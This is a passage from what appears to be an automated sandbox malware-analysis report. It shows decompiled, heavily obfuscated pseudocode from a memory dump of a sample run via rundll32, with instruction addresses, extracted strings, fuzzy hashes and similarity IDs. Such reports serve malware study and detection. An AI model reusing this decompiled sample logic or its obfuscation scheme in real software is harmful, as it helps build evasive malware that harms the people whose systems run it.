				_v688 = _v688 ^ 0x001e88ef;
				_v676 = 0x9e6d;
				_v676 = _v676 / _t504;
				_v676 = _v676 + 0xb782;
				_v676 = _v676 ^ 0x0000a4c8;
				_v684 = 0x759a;
				_v684 = _v684 << 5;
				_v684 = _v684 + 0xffff382e;
				_v684 = _v684 ^ 0x000d84b1;
				_v624 = 0x202a;
				_v624 = _v624 + 0x5730;
				_v624 = _v624 * 0x56;
				_v624 = _v624 ^ 0x00282a5a;
				_v592 = 0x2a95;
				_v592 = _v592 * 0xe;
				_v592 = _v592 ^ 0x00021224;
				_v564 = 0x9352;
				_v564 = _v564 * 0x65;
				_v564 = _v564 ^ 0x003a3f60;
				_v600 = 0x7e1f;
				_v600 = _v600 >> 7;
				_v600 = _v600 ^ 0x00005dc5;
				_t494 = _v552;
				_t546 = _v552;
				_v560 = 0xc681;
				_v560 = _v560 | 0xa5893f41;
				_v560 = _v560 ^ 0xa5898a3e;
				_v580 = 0x9fa3;
				_v580 = _v580 + 0xe136;
				_v580 = _v580 ^ 0x0001caac;
				_v692 = 0xd278;
				_v692 = _v692 | 0xa89f6e9b;
				_v692 = _v692 >> 4;
				_v692 = _v692 << 9;
				_v692 = _v692 ^ 0x13ffb75e;
				while(1) {
					L1:
					while(1) {
						L2:
						_t505 = 0x1c1fcda8;
						do {
							while(1) {
								L3:
								_t557 = _t547 - 0xcc0a13f;
								if(_t557 <= 0) {
									break;
								}
								__eflags = _t547 - _t505;
								if(_t547 == _t505) {
									_push(_t505);
									_push(_v584);
									_t466 = E001ADD24( &_v548, _v576,  &_v524, _v724, _v568, _t505, _v556);
									_t553 = _t552 + 0x1c;
									__eflags = _t466;
									if(_t466 != 0) {
										E001B01E5(_v604, _v612, _v548, _v652);
										E001B01E5(_v628, _v708, _v544, _v716);
										_t553 = _t553 + 0x18;
									}
									E001B01E5(_v620, _v700, _v556, _v596);
									_t552 = _t553 + 0xc;
									_t547 = 0x5e062c2;
									_t468 = 0x20687a51;
									_t505 = 0x1c1fcda8;
									goto L30;
								} else {
									__eflags = _t547 - 0x21ab1faf;
									if(_t547 == 0x21ab1faf) {
										_t470 = E001A1B46(_t551, _v552, 0x1001f1d0,  &_v524);
										__eflags = _t470;
										_t468 = 0x20687a51;
										if(_t470 == 0) {
											__eflags = _t494 - 0x20687a51;
											if(_t494 == 0x20687a51) {
												_t402 =  &_v572; // 0x244e3c
												E001B01E5(_v732, _v660, _v556,  *_t402);
												_t552 = _t552 + 0xc;
												_t468 = 0x20687a51;
											}
											_t547 = 0x52c4c33;
											L2:
											_t505 = 0x1c1fcda8;
										} else {
											__eflags = _t494 - 0x20687a51;
											_t505 = 0x1c1fcda8;
											_t547 =  ==  ? 0x1c1fcda8 : 0x34cd546b;
										}
										continue;
									} else {
										__eflags = _t547 - 0x34cd546b;
										if(__eflags != 0) {
											goto L30;
										} else {
											_t383 =  &_v720; // 0x48572c54
											_push( *_t383);
											_push(_v640);
											_push( &_v548);
											_push(_v616);
											_push(0);
											_push(_v744);
											_push( &_v524);
											_push(0);
											_t485 = E001B41AD(_v656, __eflags);
											_t552 = _t552 + 0x20;
											__eflags = _t485;
											if(_t485 != 0) {
												E001B01E5(_v688, _v684, _v548, _v624);
												E001B01E5(_v592, _v600, _v544, _v560);
												_t552 = _t552 + 0x18;
											}
											_t547 = 0x5e062c2;
											while(1) {
												L1:
												while(1) {
													L2:
													_t505 = 0x1c1fcda8;
													goto L3;
												}
											}
										}
									}
								}
								L33:
								return _t475;
							}
							if(_t557 == 0) {
								__eflags = _t494 - _t468;
								if(_t494 != _t468) {
									_t547 = 0x21ab1faf;
									goto L3;
								} else {
									_push(_v712);
									E001B96EA(_v664,  &_v556, _t505, _v632, _v696, _v728);
									_t552 = _t552 + 0x18;
									asm("sbb esi, esi");
									_t547 = (_t547 & 0x1c7ed37c) + 0x52c4c33;
									while(1) {
										L1:
										goto L2;
									}
								}
								goto L33;
							}
							if(_t547 != 0x8e1af5) {
								if(_t547 == 0x3101514) {
									_t479 = E001B7713();
									__eflags = _t479 - E001A61E7();
									_t468 = 0x20687a51;
									_t547 = 0xcc0a13f;
									_t494 =  !=  ? 0x20687a51 : 0xdc01450;
									goto L2;
								} else {
									if(_t547 == 0x52c4c33) {
										return E001AE380(_v580, _t546, _v692);
									}
									if(_t547 == 0x5e062c2) {
										 *((intOrPtr*)(_t546 + 0x1c)) = _t551;
										_t482 =  *0x10020718;
										 *((intOrPtr*)(_t546 + 8)) = _t482;
										 *0x10020718 = _t546;
										return _t482;
									}
									goto L30;
								}
								goto L33;
							}
							_push(_t505);
							_push(_t505);
							_t475 = E001B922B(0x38);
							_t546 = _t475;
							_t552 = _t552 + 0xc;
							__eflags = _t546;
							if(_t546 != 0) {
								_t547 = 0x3101514;
								goto L1;
							}
							goto L33;
							L30:
							__eflags = _t547 - 0x1e92555;
						} while (_t547 != 0x1e92555);
						return _t468;
					}
				}
			}

0x001b1e87
0x001b1e8e
0x001b1e90
0x001b1e98
0x001b1ea0
0x001b1eab
0x001b1ebb
0x001b1ec3
0x001b1ecb
0x001b1ed3
0x001b1edb
0x001b1ee0
0x001b1ee8
0x001b1ef0
0x001b1ef8
0x001b1f00
0x001b1f08
0x001b1f10
0x001b1f18
0x001b1f20
0x001b1f24
0x001b1f2c
0x001b1f34
0x001b1f3c
0x001b1f44
0x001b1f4c
0x001b1f5f
0x001b1f66
0x001b1f71
0x001b1f76
0x001b1f7e
0x001b1f8b
0x001b1f90
0x001b1f96
0x001b1f9e
0x001b1fa6
0x001b1fae
0x001b1fb6
0x001b1fbe
0x001b1fc6
0x001b1fce
0x001b1fd6
0x001b1fe3
0x001b1fe4
0x001b1fe8
0x001b1ff0
0x001b1ffb
0x001b2006
0x001b2011
0x001b201c
0x001b2024
0x001b202c
0x001b2034
0x001b203c
0x001b2044
0x001b204c
0x001b2051
0x001b2056
0x001b205e
0x001b2066
0x001b2074
0x001b2080
0x001b2085
0x001b208d
0x001b2097
0x001b209f
0x001b20a7
0x001b20af
0x001b20b7
0x001b20c6
0x001b20c9
0x001b20cd
0x001b20d5
0x001b20dd
0x001b20e8
0x001b20f3
0x001b20fe
0x001b2111
0x001b2118
0x001b2123
0x001b212b
0x001b2138
0x001b213c
0x001b2144
0x001b214c
0x001b215f
0x001b2162
0x001b2169
0x001b2174
0x001b2187
0x001b218e
0x001b2199
0x001b21a4
0x001b21af
0x001b21ba
0x001b21c2
0x001b21ca
0x001b21d2
0x001b21da
0x001b21e5
0x001b21f0
0x001b21fb
0x001b220b
0x001b220f
0x001b2214
0x001b221c
0x001b222f
0x001b2230
0x001b2237
0x001b223f
0x001b224a
0x001b2255
0x001b2260
0x001b2268
0x001b2273
0x001b2281
0x001b2285
0x001b228a
0x001b2292
0x001b229a
0x001b22a2
0x001b22a7
0x001b22b4
0x001b22b8
0x001b22c0
0x001b22cb
0x001b22df
0x001b22e2
0x001b22e9
0x001b22f4
0x001b2307
0x001b230e
0x001b2319
0x001b2321
0x001b232e
0x001b2332
0x001b233a
0x001b2342
0x001b234d
0x001b2358
0x001b2363
0x001b2370
0x001b2373
0x001b237f
0x001b2383
0x001b238b
0x001b2393
0x001b2398
0x001b23a0
0x001b23a8
0x001b23b0
0x001b23bb
0x001b23c6
0x001b23d1
0x001b23dc
0x001b23e4
0x001b23ef
0x001b23fa
0x001b2402
0x001b240a
0x001b240e
0x001b2413
0x001b241b
0x001b2428
0x001b2429
0x001b242d
0x001b2435
0x001b243d
0x001b244b
0x001b244f
0x001b2457
0x001b245f
0x001b2467
0x001b246c
0x001b2474
0x001b247c
0x001b2487
0x001b249a
0x001b24a1
0x001b24ac
0x001b24bf
0x001b24c6
0x001b24d1
0x001b24e4
0x001b24eb
0x001b24f6
0x001b2501
0x001b2509
0x001b2514
0x001b251b
0x001b2522
0x001b252d
0x001b2538
0x001b2543
0x001b254e
0x001b2559
0x001b2564
0x001b256c
0x001b2574
0x001b2579
0x001b257e
0x001b2586
0x001b2586
0x001b258b
0x001b258b
0x001b258b
0x001b2590
0x001b2590
0x001b2590
0x001b2590
0x001b2596
0x00000000
0x00000000
0x001b268f
0x001b2691
0x001b27b2
0x001b27b3
0x001b27e3
0x001b27e8
0x001b27eb
0x001b27ed
0x001b280f
0x001b2834
0x001b2839
0x001b2839
0x001b285c
0x001b2861
0x001b2864
0x001b2869
0x001b286e
0x00000000
0x001b2697
0x001b2697
0x001b269d
0x001b2759
0x001b275f
0x001b2761
0x001b2767
0x001b277d
0x001b277f
0x001b2781
0x001b279b
0x001b27a0
0x001b27a3
0x001b27a3
0x001b27a8
0x001b258b
0x001b258b
0x001b2769
0x001b2769
0x001b2770
0x001b2775
0x001b2775
0x00000000
0x001b26a3
0x001b26a3
0x001b26a9
0x00000000
0x001b26af
0x001b26af
0x001b26af
0x001b26ba
0x001b26c1
0x001b26c2
0x001b26d0
0x001b26d2
0x001b26dd
0x001b26de
0x001b26e0
0x001b26e5
0x001b26e8
0x001b26ea
0x001b2706
0x001b2731
0x001b2736
0x001b2736
0x001b2739
0x001b2586
0x001b2586
0x001b258b
0x001b258b
0x001b258b
0x00000000
0x001b258b
0x001b258b
0x001b2586
0x001b26a9
0x001b269d
0x001b289e
0x001b289e
0x001b289e
0x001b259c
0x001b2644
0x001b2646
0x001b2685
0x00000000
0x001b2648
0x001b2648
0x001b2668
0x001b266d
0x001b2672
0x001b267a
0x001b2586
0x001b2586
0x00000000
0x001b2586
0x001b2586
0x00000000
0x001b2646
0x001b25a8
0x001b25b0
0x001b25ef
0x001b25fb
0x001b2602
0x001b2607
0x001b260c
0x00000000
0x001b25b2
0x001b25b8
0x00000000
0x001b2893
0x001b25c4
0x001b25ca
0x001b25cd
0x001b25d2
0x001b25d5
0x00000000
0x001b25d5
0x00000000
0x001b25c4
0x00000000
0x001b25b0
0x001b2624
0x001b2625
0x001b2628
0x001b262d
0x001b262f
0x001b2632
0x001b2634
0x001b263a
0x00000000
0x001b263a
0x00000000
0x001b2873
0x001b2873
0x001b2873
0x00000000
0x001b2590
0x001b258b

Strings

Z*(, xrefs: 001B24A1
Qzh , xrefs: 001B27A3
#\, xrefs: 001B241B
`?:, xrefs: 001B24EB
3)7, xrefs: 001B1FAE
6, xrefs: 001B254E
-, xrefs: 001B224A
m, xrefs: 001B201C
/M, xrefs: 001B234D
TD, xrefs: 001B2066
T,WH, xrefs: 001B2130
Qzh , xrefs: 001B2761
Qzh , xrefs: 001B2602
L), xrefs: 001B2273
Qzh , xrefs: 001B2586
), xrefs: 001B1ED3
es-EC, xrefs: 001B25CD, 001B25D5
vC, xrefs: 001B22E9
<N$, xrefs: 001B2781
T,WH, xrefs: 001B26AF
<N$, xrefs: 001B2109
<l, xrefs: 001B1EBB
Qzh , xrefs: 001B2869

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #\$)$-$/M$3)7$6$<N$$<N$$<l$L)$Qzh $Qzh $Qzh $Qzh $Qzh $T,WH$T,WH$TD$Z*($`?:$es-EC$vC$m
API String ID: 0-2845361179
Opcode ID: b0c69ceaa8ac3b422b73468de6608e78ba729657cb8d9f459616969b5d253d10
Instruction ID: 84aeb84cd3de04ff55577fdb70517b3bad441ad4a79bd5bcd3880f94925f3766
Opcode Fuzzy Hash: b0c69ceaa8ac3b422b73468de6608e78ba729657cb8d9f459616969b5d253d10
Instruction Fuzzy Hash: 36320F715083818FE378CF65C58AA8FBBE1BBC4304F108A1DE6D9962A0D7B59948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 001A0A00, Relevance: 28.0, Strings: 22, Instructions: 524COMMON

Download Yara Rule

Strings

\, xrefs: 001A0B41
u6>, xrefs: 001A1045
ST, xrefs: 001A122A
u, xrefs: 001A107E
=f, xrefs: 001A0D92
mK, xrefs: 001A124D
u?, xrefs: 001A0FFD
4, xrefs: 001A10EB
h9, xrefs: 001A0D6F
O, xrefs: 001A1101
!?, xrefs: 001A0CB1
ox, xrefs: 001A0B62
^g, xrefs: 001A0F6C
e3s, xrefs: 001A0D57
2Q, xrefs: 001A11DF
es-EC, xrefs: 001A12D6, 001A12DE
aF, xrefs: 001A0B9D
r+, xrefs: 001A0CCE
&f', xrefs: 001A0F48
'D, xrefs: 001A1159
/, xrefs: 001A0AF0
X}, xrefs: 001A105D

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !?$&f'$'D$/$2Q$=f$O$ST$X}$^g$aF$es-EC$e3s$h9$mK$ox$r+$u6>$u?$u$4$\
API String ID: 0-2472104033
Opcode ID: 58fac3c1ab345aded2ce56f24955051811c38b1b9858e5a1a700add84c2a2831
Instruction ID: cd000bdad1884115b97ee6a4f9c3491c3ebd8fcc29e856e24088d6f2d9994b44
Opcode Fuzzy Hash: 58fac3c1ab345aded2ce56f24955051811c38b1b9858e5a1a700add84c2a2831
Instruction Fuzzy Hash: A9523F719083819FE378CF25C54AB8BBBE1BBC5718F00891DE5DA962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B06D1, Relevance: 27.9, Strings: 22, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001B06D1() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				signed int _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				void* _t511;
				intOrPtr* _t516;
				void* _t519;
				signed int _t532;
				intOrPtr* _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				void* _t549;
				void* _t559;
				void* _t608;
				signed int _t610;
				signed int* _t614;

				_t614 =  &_v1244;
				_v1048 = 0x5729c7;
				_v1044 = 0;
				_v1232 = 0x3f7d;
				_v1056 = 0;
				_t534 = 0x46;
				_v1232 = _v1232 / _t534;
				_v1232 = _v1232 | 0x5ddac330;
				_t608 = 0x16ff3a98;
				_t535 = 0xd;
				_v1232 = _v1232 / _t535;
				_v1232 = _v1232 ^ 0x0738365c;
				_v1068 = 0xaaf5;
				_t536 = 0x28;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x8008037d;
				_v1064 = 0x2ab1;
				_v1064 = _v1064 ^ 0x3e1e36b1;
				_v1064 = _v1064 ^ 0x3e1e1c02;
				_v1200 = 0x3258;
				_v1200 = _v1200 / _t536;
				_v1200 = _v1200 | 0xd11e33d7;
				_v1200 = _v1200 ^ 0x64a51536;
				_v1200 = _v1200 ^ 0xb5bb3bf6;
				_v1208 = 0xc18;
				_v1208 = _v1208 << 2;
				_v1208 = _v1208 + 0xffff834f;
				_t537 = 0xa;
				_v1208 = _v1208 * 0x2d;
				_v1208 = _v1208 ^ 0xfff2f906;
				_v1216 = 0xd989;
				_v1216 = _v1216 ^ 0x050146d5;
				_v1216 = _v1216 >> 1;
				_v1216 = _v1216 + 0x5bf8;
				_v1216 = _v1216 ^ 0x0281611e;
				_v1224 = 0xf28c;
				_v1224 = _v1224 * 0x6b;
				_v1224 = _v1224 * 0x5f;
				_v1224 = _v1224 | 0x723951a5;
				_v1224 = _v1224 ^ 0x77bfef8f;
				_v1120 = 0x741b;
				_v1120 = _v1120 * 0x43;
				_v1120 = _v1120 ^ 0x001e1b57;
				_v1212 = 0xbbd9;
				_v1212 = _v1212 / _t537;
				_v1212 = _v1212 ^ 0xaa55a49a;
				_v1212 = _v1212 ^ 0xe13c950e;
				_v1212 = _v1212 ^ 0x4b6944e4;
				_v1060 = 0x2b7f;
				_v1060 = _v1060 + 0x6703;
				_v1060 = _v1060 ^ 0x0000c8df;
				_v1160 = 0xaa30;
				_v1160 = _v1160 + 0xcac3;
				_t538 = 0x23;
				_v1160 = _v1160 / _t538;
				_v1160 = _v1160 ^ 0x00002fc9;
				_v1108 = 0x88a4;
				_v1108 = _v1108 + 0xdd4b;
				_v1108 = _v1108 ^ 0x0001674d;
				_v1076 = 0x973d;
				_t610 = 0x4b;
				_v1076 = _v1076 / _t610;
				_v1076 = _v1076 ^ 0x00007c76;
				_v1116 = 0x7334;
				_v1116 = _v1116 << 0xd;
				_v1116 = _v1116 ^ 0x0e66a665;
				_v1196 = 0x8bea;
				_t539 = 0x76;
				_v1196 = _v1196 * 0x1f;
				_v1196 = _v1196 >> 2;
				_v1196 = _v1196 * 0x37;
				_v1196 = _v1196 ^ 0x00e8ab68;
				_v1172 = 0x3943;
				_v1172 = _v1172 + 0x59fe;
				_v1172 = _v1172 + 0xffff8dfe;
				_v1172 = _v1172 ^ 0x000004b9;
				_v1236 = 0xfbb5;
				_v1236 = _v1236 | 0x1d43cf57;
				_v1236 = _v1236 + 0x976b;
				_v1236 = _v1236 >> 2;
				_v1236 = _v1236 ^ 0x075157fd;
				_v1100 = 0x8b7c;
				_v1100 = _v1100 ^ 0x39c71bcd;
				_v1100 = _v1100 ^ 0x39c7b188;
				_v1228 = 0x6c89;
				_v1228 = _v1228 * 0x3f;
				_v1228 = _v1228 ^ 0x5eac9e23;
				_v1228 = _v1228 ^ 0x483373a4;
				_v1228 = _v1228 ^ 0x168555a0;
				_v1124 = 0xffcd;
				_v1124 = _v1124 ^ 0x9623e43c;
				_v1124 = _v1124 ^ 0x962361d0;
				_v1220 = 0xafcf;
				_v1220 = _v1220 >> 9;
				_v1220 = _v1220 | 0x5e0d592e;
				_v1220 = _v1220 ^ 0xc782554a;
				_v1220 = _v1220 ^ 0x998f2542;
				_v1204 = 0x70e7;
				_v1204 = _v1204 << 8;
				_v1204 = _v1204 | 0x4bcd6c4e;
				_v1204 = _v1204 ^ 0x66d43b16;
				_v1204 = _v1204 ^ 0x2d29cb7c;
				_v1148 = 0xbb91;
				_v1148 = _v1148 >> 3;
				_v1148 = _v1148 * 0x6f;
				_v1148 = _v1148 ^ 0x000a7523;
				_v1240 = 0x1e05;
				_v1240 = _v1240 * 0x58;
				_v1240 = _v1240 | 0xe3e83a57;
				_v1240 = _v1240 << 0x10;
				_v1240 = _v1240 ^ 0x7bff2c2d;
				_v1244 = 0x745d;
				_v1244 = _v1244 + 0x33c5;
				_v1244 = _v1244 ^ 0xd5b0dba8;
				_v1244 = _v1244 / _t539;
				_v1244 = _v1244 ^ 0x01cfdba1;
				_v1084 = 0xf7a8;
				_v1084 = _v1084 + 0x39e5;
				_v1084 = _v1084 ^ 0x0001191a;
				_v1156 = 0x2f;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 >> 7;
				_v1156 = _v1156 ^ 0x00003f42;
				_v1132 = 0x2a;
				_t540 = 0x4c;
				_v1132 = _v1132 * 0x2d;
				_v1132 = _v1132 + 0xffff4b01;
				_v1132 = _v1132 ^ 0xffff1635;
				_v1092 = 0x403;
				_v1092 = _v1092 / _t540;
				_v1092 = _v1092 ^ 0x00004426;
				_v1188 = 0xe729;
				_t541 = 0x1f;
				_v1188 = _v1188 * 0x16;
				_v1188 = _v1188 | 0x3770778a;
				_v1188 = _v1188 / _t541;
				_v1188 = _v1188 ^ 0x01c9ca76;
				_v1164 = 0x42eb;
				_t542 = 0x24;
				_v1164 = _v1164 * 0x76;
				_v1164 = _v1164 + 0xffff1c76;
				_v1164 = _v1164 ^ 0x001dbb44;
				_v1176 = 0xe65d;
				_v1176 = _v1176 | 0x22e501d4;
				_v1176 = _v1176 + 0x92cd;
				_v1176 = _v1176 ^ 0x22e6042b;
				_v1072 = 0x7acf;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x000057cf;
				_v1140 = 0xc399;
				_v1140 = _v1140 ^ 0xab6fd5a5;
				_v1140 = _v1140 * 0x35;
				_v1140 = _v1140 ^ 0x7dffbe78;
				_v1192 = 0x298a;
				_v1192 = _v1192 + 0xab31;
				_v1192 = _v1192 << 9;
				_v1192 = _v1192 / _t542;
				_v1192 = _v1192 ^ 0x000bc896;
				_v1112 = 0x771f;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x00004e3a;
				_v1168 = 0x52e9;
				_v1168 = _v1168 ^ 0x23d4324b;
				_t543 = 0x71;
				_v1168 = _v1168 / _t543;
				_v1168 = _v1168 ^ 0x00514d02;
				_v1128 = 0x9fe0;
				_t544 = 0x26;
				_v1128 = _v1128 / _t544;
				_t545 = 0x6b;
				_v1128 = _v1128 / _t545;
				_v1128 = _v1128 ^ 0x00002fb1;
				_v1136 = 0x708;
				_v1136 = _v1136 >> 0xb;
				_t546 = 0x42;
				_t532 = _v1056;
				_v1136 = _v1136 / _t546;
				_v1136 = _v1136 ^ 0x0000728b;
				_v1144 = 0x2d32;
				_v1144 = _v1144 | 0xfcc5203d;
				_v1144 = _v1144 >> 6;
				_v1144 = _v1144 ^ 0x03f3674c;
				_v1096 = 0xb2ab;
				_v1096 = _v1096 + 0x9107;
				_v1096 = _v1096 ^ 0x00011ca8;
				_v1104 = 0xe5f;
				_v1104 = _v1104 / _t610;
				_v1104 = _v1104 ^ 0x00007f3d;
				_v1180 = 0xbc0d;
				_t547 = 0x73;
				_v1180 = _v1180 * 0x63;
				_v1180 = _v1180 / _t547;
				_v1180 = _v1180 ^ 0x0000aa3b;
				_v1184 = 0x3c9f;
				_v1184 = _v1184 << 4;
				_t548 = 0x72;
				_v1184 = _v1184 / _t548;
				_v1184 = _v1184 + 0xffffd2f4;
				_v1184 = _v1184 ^ 0xffffc0a8;
				_v1080 = 0xb1b0;
				_v1080 = _v1080 + 0x2e4d;
				_v1080 = _v1080 ^ 0x000083b9;
				_v1088 = 0xe660;
				_v1088 = _v1088 << 8;
				_v1088 = _v1088 ^ 0x00e644b1;
				_v1152 = 0xe289;
				_v1152 = _v1152 >> 8;
				_v1152 = _v1152 | 0xee59f178;
				_v1152 = _v1152 ^ 0xee59f1fb;
				while(1) {
					L1:
					_t511 = 0x5c;
					_t549 = 0x84d069a;
					do {
						L2:
						while(_t608 != 0x5757c61) {
							if(_t608 == _t549) {
								_t516 = E001ACDA4( &_v1040, _v1128, _v1136, _v1052, 2 + E001ABBEA(_v1192, _v1112,  &_v1040, _v1168) * 2, _v1144, _v1096, _v1104, _v1152, _v1180, _t532);
								_t614 =  &(_t614[0xc]);
								__eflags = _t516;
								_t608 = 0x5757c61;
								_v1056 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t608 == 0x16ff3a98) {
									_push(_t549);
									E001B1DA0(_v1208, _v1216, _v1224,  &_v520, _v1120, _t549, _v1232);
									_t614 =  &(_t614[8]);
									_t608 = 0x2f1aa6db;
									while(1) {
										L1:
										_t511 = 0x5c;
										_t549 = 0x84d069a;
										goto L2;
									}
								} else {
									if(_t608 == 0x2a9198cf) {
										_t533 =  *0x10020724;
										while(1) {
											__eflags =  *_t533 - _t511;
											if(__eflags == 0) {
												break;
											}
											_t533 = _t533 + 2;
											__eflags = _t533;
										}
										_t532 = _t533 + 2;
										_t608 = 0x2b0b6026;
										continue;
									} else {
										if(_t608 == 0x2b0b6026) {
											_push(_v1148);
											_push(_v1204);
											_t519 = E001A5EBA(_v1220, 0x1001f7b0, __eflags);
											_pop(_t559);
											__eflags = E001B7485(_v1240, _t559, _v1084, _t559, _v1156, _v1132, _t559, _t519, _v1068, _t559, _t559, _v1092, _v1064, _v1188,  &_v1052, _v1164);
											_t608 =  ==  ? 0x84d069a : 0x18cecc59;
											E001AED35(_v1176, _t519, _v1072, _v1140);
											_t614 =  &(_t614[0x11]);
											L17:
											_t549 = 0x84d069a;
											_t511 = 0x5c;
										} else {
											_t621 = _t608 - 0x2f1aa6db;
											if(_t608 == 0x2f1aa6db) {
												_push(_v1160);
												_push(_v1060);
												E001AE32E(E001A5EBA(_v1212, 0x1001f820, _t621), _t621, _v1076, _v1116,  *0x10020724 + 0x238, _v1196, 0x104,  &_v1040, _v1172,  &_v520,  *0x10020724, _v1236);
												E001AED35(_v1100, _t525, _v1228, _v1124);
												_t614 =  &(_t614[0xe]);
												_t608 = 0x2a9198cf;
												while(1) {
													L1:
													_t511 = 0x5c;
													_t549 = 0x84d069a;
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E001A25C8(_v1184, _v1052, _v1088);
						_t608 = 0x18cecc59;
						goto L17;
						L18:
						__eflags = _t608 - 0x18cecc59;
					} while (__eflags != 0);
					return _v1056;
				}
			}

0x001b06d1
0x001b06d7
0x001b06e4
0x001b06ed
0x001b06f8
0x001b0706
0x001b070b
0x001b0711
0x001b0719
0x001b0722
0x001b0727
0x001b072d
0x001b0735
0x001b0748
0x001b074b
0x001b0752
0x001b075d
0x001b0768
0x001b0773
0x001b077e
0x001b078e
0x001b0792
0x001b079a
0x001b07a2
0x001b07aa
0x001b07b2
0x001b07b7
0x001b07c4
0x001b07c7
0x001b07cb
0x001b07d3
0x001b07db
0x001b07e3
0x001b07e7
0x001b07ef
0x001b07f7
0x001b0804
0x001b080d
0x001b0811
0x001b0819
0x001b0821
0x001b0834
0x001b083b
0x001b0846
0x001b0854
0x001b0858
0x001b0860
0x001b0868
0x001b0870
0x001b087b
0x001b0886
0x001b0891
0x001b0899
0x001b08a7
0x001b08ac
0x001b08b2
0x001b08ba
0x001b08c5
0x001b08d0
0x001b08db
0x001b08ed
0x001b08f2
0x001b08fb
0x001b0906
0x001b0911
0x001b0919
0x001b0924
0x001b0931
0x001b0932
0x001b0936
0x001b0940
0x001b0944
0x001b094c
0x001b0954
0x001b095c
0x001b0964
0x001b096c
0x001b0974
0x001b097c
0x001b0984
0x001b0989
0x001b0991
0x001b099c
0x001b09a7
0x001b09b2
0x001b09bf
0x001b09c3
0x001b09cb
0x001b09d3
0x001b09db
0x001b09e6
0x001b09f1
0x001b09fc
0x001b0a04
0x001b0a09
0x001b0a11
0x001b0a19
0x001b0a21
0x001b0a29
0x001b0a2e
0x001b0a36
0x001b0a3e
0x001b0a46
0x001b0a4e
0x001b0a58
0x001b0a5c
0x001b0a64
0x001b0a71
0x001b0a75
0x001b0a7d
0x001b0a82
0x001b0a8a
0x001b0a92
0x001b0a9a
0x001b0aa8
0x001b0aac
0x001b0ab4
0x001b0abf
0x001b0aca
0x001b0ad5
0x001b0add
0x001b0ae4
0x001b0ae9
0x001b0af1
0x001b0b06
0x001b0b09
0x001b0b10
0x001b0b1b
0x001b0b26
0x001b0b3c
0x001b0b43
0x001b0b4e
0x001b0b5b
0x001b0b5e
0x001b0b62
0x001b0b72
0x001b0b76
0x001b0b7e
0x001b0b8b
0x001b0b8e
0x001b0b92
0x001b0b9a
0x001b0ba2
0x001b0baa
0x001b0bb2
0x001b0bba
0x001b0bc2
0x001b0bcd
0x001b0bd5
0x001b0be0
0x001b0be8
0x001b0bf5
0x001b0bf9
0x001b0c01
0x001b0c09
0x001b0c11
0x001b0c1e
0x001b0c22
0x001b0c2a
0x001b0c35
0x001b0c3d
0x001b0c48
0x001b0c50
0x001b0c5c
0x001b0c61
0x001b0c67
0x001b0c6f
0x001b0c81
0x001b0c86
0x001b0c96
0x001b0c99
0x001b0ca0
0x001b0cab
0x001b0cb3
0x001b0cc5
0x001b0cca
0x001b0cd1
0x001b0cd5
0x001b0cdd
0x001b0ce5
0x001b0ced
0x001b0cf2
0x001b0cfa
0x001b0d05
0x001b0d10
0x001b0d1b
0x001b0d31
0x001b0d3a
0x001b0d45
0x001b0d52
0x001b0d55
0x001b0d61
0x001b0d65
0x001b0d6d
0x001b0d75
0x001b0d7e
0x001b0d81
0x001b0d85
0x001b0d8d
0x001b0d95
0x001b0da0
0x001b0dab
0x001b0db6
0x001b0dc1
0x001b0dc9
0x001b0dd4
0x001b0ddc
0x001b0de1
0x001b0de9
0x001b0df1
0x001b0df1
0x001b0df3
0x001b0df4
0x001b0df9
0x00000000
0x001b0df9
0x001b0e07
0x001b1015
0x001b101c
0x001b101f
0x001b1021
0x001b1029
0x00000000
0x001b0e0d
0x001b0e13
0x001b0f80
0x001b0fa5
0x001b0faa
0x001b0fad
0x001b0df1
0x001b0df1
0x001b0df3
0x001b0df4
0x00000000
0x001b0df4
0x001b0e19
0x001b0e1f
0x001b0f63
0x001b0f6e
0x001b0f6e
0x001b0f71
